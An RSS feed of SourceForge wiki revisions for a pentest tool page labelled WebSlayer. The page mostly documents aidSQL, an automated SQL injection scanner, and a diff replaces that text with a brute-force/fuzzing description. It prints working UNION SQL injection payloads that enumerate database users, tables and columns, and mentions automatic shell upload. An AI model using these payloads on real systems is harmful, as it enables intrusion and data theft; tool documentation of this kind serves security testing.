<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Recent changes to WebSlayer-en</title><link>https://sourceforge.net/p/maguey/wiki/WebSlayer-en/</link><description>Recent changes to WebSlayer-en</description><atom:link href="https://sourceforge.net/p/maguey/wiki/WebSlayer-en/feed" rel="self"/><language>en</language><lastBuildDate>Thu, 12 Dec 2013 19:59:36 -0000</lastBuildDate><atom:link href="https://sourceforge.net/p/maguey/wiki/WebSlayer-en/feed" rel="self" type="application/rss+xml"/><item><title>WebSlayer-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/WebSlayer-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v1
+++ v2
@@ -14,44 +14,37 @@
 &lt;!-- **********************  DESCRIPTION ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Description: &lt;/h3&gt;
-Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.
+Tool that performs brute force attack combined with fuzzing techniques, thus enabling the exploitation of vulnerable parameters and headers through POST and GET methods.

 &lt;!-- **********************  OBJECTIVES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Objective:&lt;/h3&gt;
 &lt;ul&gt;
-&lt;li&gt;Automated detection of parameters vulnerable to SQL Injection.
-&lt;/li&gt;&lt;li&gt;Automated and configurable data base data mining.
-&lt;/li&gt;&lt;li&gt;Automated shell upload in order to comprise the application server.
+&lt;/li&gt;&lt;li&gt;Exploit vulnerabilities present on web application through fuzzing techniques.
 &lt;/li&gt;&lt;/ul&gt;

 &lt;!-- **********************  FEATURES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Features:&lt;/h3&gt;
-&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP/HTTPS) with a MySQL database backend.
+&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP/HTTPS).

 &lt;b&gt;Operative mode:&lt;/b&gt; Active.

 &lt;p&gt;
-Automated detection of parameters vulnerable to SQL Injection.
+Exploit vulnerabilities present on web application through fuzzing techniques.
 &lt;ul&gt;
-&lt;li&gt;Automated parameter tampering for both URL parameters (GET) and form data (POST).
-&lt;/li&gt;&lt;li&gt;Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
-&lt;/li&gt;&lt;li&gt;Provides the name of the parameter and URL from the detected vulnerabilities.
+&lt;/li&gt;&lt;li&gt;Support for both basic and NTML authentication.
+&lt;/li&gt;&lt;li&gt;Offers 15 different coding types.
+&lt;/li&gt;&lt;li&gt;Support for session management.
+&lt;/li&gt;&lt;li&gt;Customizable payloads:
+&lt;ul&gt;
+&lt;li&gt;Regular expressions.
+&lt;/li&gt;&lt;li&gt;Range of words.
+&lt;/li&gt;&lt;li&gt;Permutation of characters.
+&lt;/li&gt;&lt;li&gt;Logins from people's names.
+&lt;/li&gt;&lt;li&gt;Credit Card numbers.
 &lt;/li&gt;&lt;/ul&gt;
-&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;
-
-&lt;p&gt;
-Automated and configurable data base data mining.
-&lt;ul&gt;
-&lt;li&gt;Retrieves the following information 
-&lt;ul&gt;
-&lt;li&gt;Database user name.
-&lt;/li&gt;&lt;li&gt;Database name.
-&lt;/li&gt;&lt;li&gt;Database version.
-&lt;/li&gt;&lt;li&gt;Database tables.
-&lt;/li&gt;&lt;li&gt;Database tables schema: keys, fields names and type.
-&lt;/li&gt;&lt;/ul&gt;
+&lt;/li&gt;&lt;li&gt;Capabilities to perform a separated fuzzing over two different parameters with different list of words.
 &lt;/li&gt;&lt;/ul&gt;
 &lt;/p&gt;

@@ -66,164 +59,26 @@
 &lt;!-- **********************  USAGE ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Basic usage:&lt;/h3&gt;
-&lt;b&gt;Perform an automated scan on a web application. &lt;/b&gt;The following instruction initiates an automated scan on the web application.
-
-&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
-./aidSQL --url=[URL] --no-shell
-&lt;/div&gt;&lt;br /&gt;
+&lt;b&gt;Perform a brute force attack on a web application login page. &lt;/b&gt;Start the tool and on the “Applications” menu provide the following information:

 &lt;p&gt;
-Dónde:
 &lt;ul&gt;
-&lt;li&gt;--url: Web application URL address. 
-&lt;/li&gt;&lt;li&gt;--no-shell: Disabled the option to upload a shell. 
+&lt;/li&gt;&lt;li&gt;Web application login URL address.
+&lt;/li&gt;&lt;li&gt;HTTP headers to be included on the petition.
+&lt;/li&gt;&lt;li&gt;Parameters to be sent along the petition either through GET/POST method.
+&lt;/li&gt;&lt;li&gt;List of word to be used in the brute force attack.
 &lt;/li&gt;&lt;/ul&gt;
 &lt;/p&gt;

-Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.
+Include the fuzzer identifier “FUZZ” or “FUZ2Z” on the required parameters to be included on the brute force attack.

-The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.
+Once the configuration is done, press the “Start attack” button to initiate the brute force attack. In the progress bar will be displayed the status of the attack for the number of word being tested and the remaining ones.

-&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
-Normalized URL: http://midominio.com.mx/miaplicacion/&lt;br /&gt;
-&lt;br /&gt;
-Crawling ...&lt;br /&gt;
-&lt;br /&gt;
-Fetching content from http://midominio.com.mx/miaplicacion/&lt;br /&gt;
-&lt;br /&gt;
-200 OK&lt;br /&gt;
-&lt;br /&gt;
-TOTAL URL's found: 55&lt;br /&gt;
-&lt;br /&gt;
-Add file index.jsp ...&lt;br /&gt;
-&lt;br /&gt;
-Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html&lt;br /&gt;
-&lt;br /&gt;
-Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"&lt;br /&gt;
-&lt;br /&gt;
-Parsing previously crawled URL, looking for new parameters&lt;br /&gt;
-&lt;br /&gt;
-Adding new parameter "do"&lt;br /&gt;
+When the attack finishes, on the progress bar will be displayed the message “Attack finished OK”.
+The results will be displayed under each one of the list of words, including the results which were successful at accessing the web application.

-&lt;/div&gt;&lt;br /&gt;
+On the “Logs” tab additional information will be presented such start and end of the attack, list of words used for the attack, URL, etc.

-This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.
-
-&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
-Testing links ...&lt;br /&gt;
-&lt;br /&gt;
- 1. { http://midominio.com.mx/miaplicacion/index.jsp } &lt;br /&gt;
-&lt;br /&gt;
-Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp &lt;br /&gt;
- Set method GET …&lt;br /&gt;
-&lt;br /&gt;
-Load sqli =&gt; mysql5 ... OK &lt;br /&gt;
-&lt;br /&gt;
-Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome&lt;br /&gt;
-&lt;br /&gt;
-sql injection plugin...&lt;br /&gt;
-&lt;br /&gt;
-[1][ [message] | METHOD: unionQuery&lt;br /&gt;
-&lt;br /&gt;
-[QUERY]    | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*&lt;br /&gt;
-&lt;br /&gt;
-Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+&lt;br /&gt;UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A &lt;br /&gt;
- [WW] WARNING: GOT 403&lt;br /&gt;
-&lt;br /&gt;
- [2][ message] | METHOD: unionQuery …&lt;br /&gt;
-
-&lt;/div&gt;&lt;br /&gt;
-
-During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.
-
-&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
-Site is vulnerable to sql injection!&lt;br /&gt;
-&lt;br /&gt;
-Skipping calling plugin's get shell method&lt;br /&gt;
-&lt;br /&gt;
-Fetching database user ...&lt;br /&gt;
-&lt;br /&gt;
-[message] | METHOD: unionQuery&lt;br /&gt;
-&lt;br /&gt;
- [QUERY]   | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; --  
-Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+&lt;br /&gt;SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
-&lt;br /&gt;
-FOUND DATABASE seguridad &lt;br /&gt;
-[message]  | METHOD: unionQuery&lt;br /&gt;
-&lt;br /&gt;
-[QUERY]    | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT&lt;br /&gt;(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,&lt;br /&gt;IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; -- 
-&lt;br /&gt;
-Normalized URL: &lt;br /&gt;
-http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+&lt;br /&gt;UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C&lt;br /&gt;TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
-&lt;br /&gt;
-Fetching table "cuentas" columns ...&lt;br /&gt;
-&lt;br /&gt;
-[message]  | METHOD: unionQuery&lt;br /&gt;
-&lt;br /&gt;
-[QUERY]    | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT&lt;br /&gt;(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5 &lt;br /&gt;FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; -- 
-&lt;br /&gt;
-Normalized URL:&lt;br /&gt; 
-http://midominio.com.mx/miaplicacion&lt;br /&gt;/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+&lt;br /&gt;UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+&lt;br /&gt;FROM+information_schema.columns+&lt;br /&gt;WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&amp;amp;password=prueba&amp;amp;user-info-php-submit-button=View%2BAccount%2BDetails&amp;amp;page=user-info.php
-&lt;/div&gt;&lt;br /&gt;
-
-When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.
-
-&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
-VULNERABLE LINKS FOUND : 1&lt;br /&gt;
-TOTAL TIME         : 53 seconds&lt;br /&gt;
-&lt;/div&gt;&lt;br /&gt;
-
-La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna: 
-&lt;ul&gt;
-&lt;li&gt;Folder /logs/\[application name\]
-&lt;/li&gt;&lt;li&gt;Log file - index.php_console.log
-&lt;/li&gt;&lt;li&gt;XML file - index.php_db_schemas.xml
-&lt;/li&gt;&lt;/ul&gt;
-
-index.php_console.log file example:
-
-&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
-HOST midominio.com.mx
-------------------------------------&lt;br /&gt;
-PLUGIN NAME        :   UNION&lt;br /&gt;
-PLUGIN AUTHOR      :   Juan Stange&lt;br /&gt;
-REQUEST VARIABLES  :   message, do, info, page,…&lt;br /&gt;
-VULNERABLE LINK        :   http://midominio.com.mx/miaplicacion&lt;br /&gt;/index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+&lt;br /&gt;SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e&lt;br /&gt;%29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+&lt;br /&gt;table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+ &lt;br /&gt;
-------------------------------------------------&lt;br /&gt;
-SCHEMA seguridad&lt;br /&gt;
-------------------------------------------------&lt;br /&gt;
-VERSION : 5.5.16&lt;br /&gt;
-DATADIR : &lt;br /&gt;
-&lt;br /&gt;
-TABLE cuentas&lt;br /&gt;
----------------------&lt;br /&gt;
-type       :   BASE TABLE&lt;br /&gt;
-engine     :   InnoDB&lt;br /&gt;
-collation      :   latin1_swedish_ci&lt;br /&gt;
-increment  :   1&lt;br /&gt;
-&lt;br /&gt;
-COLUMNS&lt;br /&gt;
----------------------&lt;br /&gt;
-NAME       :   cid&lt;br /&gt;
-       type        int(11)&lt;br /&gt;
-       key     0&lt;br /&gt;
-       extra       0&lt;br /&gt;
-NAME       :   username&lt;br /&gt;
-…&lt;br /&gt;
-
-&lt;/div&gt;&lt;br /&gt;
-
-index.php_db_schemas.xml file example:
-
-&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
-&amp;lt;schemas&gt;&lt;br /&gt;
-&amp;lt;database name="owasp10" version="5.5.16" datadir=""&gt;&lt;br /&gt;
-&amp;lt;tables&gt;&lt;br /&gt;
-&amp;lt;table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1"&gt;&lt;br /&gt;
-&amp;lt;column name="cid"&gt;&amp;lt;type&gt;int(11)&amp;lt;/type&gt;&amp;lt;key&gt;0&amp;lt;/key&gt;&amp;lt;extra&gt;0&amp;lt;/extra&gt;&amp;lt;/column&gt;&lt;br /&gt;
-&amp;lt;column name="username"&gt;&amp;lt;type&gt;text&amp;lt;/type&gt;&amp;lt;key&gt;0&amp;lt;/key&gt;&amp;lt;extra&gt;0&amp;lt;/extra&gt;&amp;lt;/column&gt;&lt;br /&gt;
-…&lt;br /&gt;
-&lt;/div&gt;&lt;br /&gt;

 &lt;!-- **********************  RESOURCES ********************** --&gt;

&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Thu, 12 Dec 2013 19:59:36 -0000</pubDate><guid>https://sourceforge.net455c591050cb442088e9d8a4d714956e8e519b0f</guid></item><item><title>WebSlayer-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/WebSlayer-en/</link><description>&lt;div class="markdown_content"&gt;&lt;!-- ###################################### ENGLISH VERSION ###################################### --&gt;
&lt;p&gt;&lt;img height="25%" src="https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png" style="float: right;" width="25%" /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-en/" style="color: #4CAB68; text-decoration: underline;"&gt;Back&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href="https://sourceforge.net/p/maguey/wiki/WebSlayer-es" style="color: #4CAB68; text-decoration: underline;"&gt;Español&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;h1 style="color: #4CAB68;"&gt;WebSlayer&lt;/h1&gt;
&lt;!-- **********************  PHASES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Phase(s):&lt;/h3&gt;
&lt;p&gt;Primary: Exploitation.&lt;br /&gt;
Secondary:  N/A.&lt;/p&gt;
&lt;!-- **********************  DESCRIPTION ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Description: &lt;/h3&gt;
&lt;p&gt;Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.&lt;/p&gt;
&lt;!-- **********************  OBJECTIVES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Objective:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Automated detection of parameters vulnerable to SQL Injection.
&lt;/li&gt;&lt;li&gt;Automated and configurable data base data mining.
&lt;/li&gt;&lt;li&gt;Automated shell upload in order to comprise the application server.
&lt;/li&gt;&lt;/ul&gt;
&lt;!-- **********************  FEATURES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Features:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP/HTTPS) with a MySQL database backend.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Operative mode:&lt;/b&gt; Active.&lt;/p&gt;
&lt;p&gt;
Automated detection of parameters vulnerable to SQL Injection.
&lt;ul&gt;
&lt;li&gt;Automated parameter tampering for both URL parameters (GET) and form data (POST).
&lt;/li&gt;&lt;li&gt;Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
&lt;/li&gt;&lt;li&gt;Provides the name of the parameter and URL from the detected vulnerabilities.
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;p&gt;
Automated and configurable data base data mining.
&lt;ul&gt;
&lt;li&gt;Retrieves the following information 
&lt;ul&gt;
&lt;li&gt;Database user name.
&lt;/li&gt;&lt;li&gt;Database name.
&lt;/li&gt;&lt;li&gt;Database version.
&lt;/li&gt;&lt;li&gt;Database tables.
&lt;/li&gt;&lt;li&gt;Database tables schema: keys, fields names and type.
&lt;/li&gt;&lt;/ul&gt;
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Reports:&lt;/b&gt;&lt;br /&gt;
Output reports:  &lt;span style="color: #4CAB68; font-weight: bold; font-style: italic; font-size: 20px;"&gt;&amp;#10004;&lt;/span&gt;
&lt;ul&gt;
&lt;li&gt;Merge report from the exploitation and data mining in TXT and XML format.
&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;
&lt;!-- **********************  USAGE ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Basic usage:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Perform an automated scan on a web application. &lt;/b&gt;The following instruction initiates an automated scan on the web application.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
./aidSQL --url=[URL] --no-shell
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;
Dónde:
&lt;ul&gt;
&lt;li&gt;--url: Web application URL address. 
&lt;/li&gt;&lt;li&gt;--no-shell: Disabled the option to upload a shell. 
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;p&gt;Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.&lt;/p&gt;
&lt;p&gt;The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
Normalized URL: http://midominio.com.mx/miaplicacion/&lt;br /&gt;
&lt;br /&gt;
Crawling ...&lt;br /&gt;
&lt;br /&gt;
Fetching content from http://midominio.com.mx/miaplicacion/&lt;br /&gt;
&lt;br /&gt;
200 OK&lt;br /&gt;
&lt;br /&gt;
TOTAL URL's found: 55&lt;br /&gt;
&lt;br /&gt;
Add file index.jsp ...&lt;br /&gt;
&lt;br /&gt;
Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html&lt;br /&gt;
&lt;br /&gt;
Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"&lt;br /&gt;
&lt;br /&gt;
Parsing previously crawled URL, looking for new parameters&lt;br /&gt;
&lt;br /&gt;
Adding new parameter "do"&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
Testing links ...&lt;br /&gt;
&lt;br /&gt;
 1. { http://midominio.com.mx/miaplicacion/index.jsp }  &lt;br /&gt;
&lt;br /&gt;
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp &lt;br /&gt;
 Set method GET …&lt;br /&gt;
&lt;br /&gt;
Load sqli =&gt; mysql5 ... OK &lt;br /&gt;
&lt;br /&gt;
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome&lt;br /&gt;
&lt;br /&gt;
sql injection plugin...&lt;br /&gt;
&lt;br /&gt;
[1][ [message]  | METHOD: unionQuery&lt;br /&gt;
&lt;br /&gt;
[QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*&lt;br /&gt;
&lt;br /&gt;
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+&lt;br /&gt;UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A &lt;br /&gt;
 [WW] WARNING: GOT 403&lt;br /&gt;
&lt;br /&gt;
 [2][ message]  | METHOD: unionQuery …&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
Site is vulnerable to sql injection!&lt;br /&gt;
&lt;br /&gt;
Skipping calling plugin's get shell method&lt;br /&gt;
&lt;br /&gt;
Fetching database user ...&lt;br /&gt;
&lt;br /&gt;
[message] | METHOD: unionQuery&lt;br /&gt;
&lt;br /&gt;
 [QUERY]    | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; --  
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+&lt;br /&gt;SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
&lt;br /&gt;
FOUND DATABASE seguridad &lt;br /&gt;
[message]   | METHOD: unionQuery&lt;br /&gt;
&lt;br /&gt;
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT&lt;br /&gt;(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,&lt;br /&gt;IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; -- 
&lt;br /&gt;
Normalized URL: &lt;br /&gt;
http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+&lt;br /&gt;UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C&lt;br /&gt;TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
&lt;br /&gt;
Fetching table "cuentas" columns ...&lt;br /&gt;
&lt;br /&gt;
[message]   | METHOD: unionQuery&lt;br /&gt;
&lt;br /&gt;
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT&lt;br /&gt;(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5 &lt;br /&gt;FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; -- 
&lt;br /&gt;
Normalized URL:&lt;br /&gt; 
http://midominio.com.mx/miaplicacion&lt;br /&gt;/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+&lt;br /&gt;UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+&lt;br /&gt;FROM+information_schema.columns+&lt;br /&gt;WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&amp;amp;password=prueba&amp;amp;user-info-php-submit-button=View%2BAccount%2BDetails&amp;amp;page=user-info.php
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
VULNERABLE LINKS FOUND  : 1&lt;br /&gt;
TOTAL TIME          : 53 seconds&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna: &lt;br /&gt;
&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;Folder /logs/[application name]&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Log file - index.php_console.log&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;XML file - index.php_db_schemas.xml&lt;br /&gt;
&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;
&lt;p&gt;index.php_console.log file example:&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
HOST midominio.com.mx
------------------------------------&lt;br /&gt;
PLUGIN NAME     :   UNION&lt;br /&gt;
PLUGIN AUTHOR       :   Juan Stange&lt;br /&gt;
REQUEST VARIABLES   :   message, do, info, page,…&lt;br /&gt;
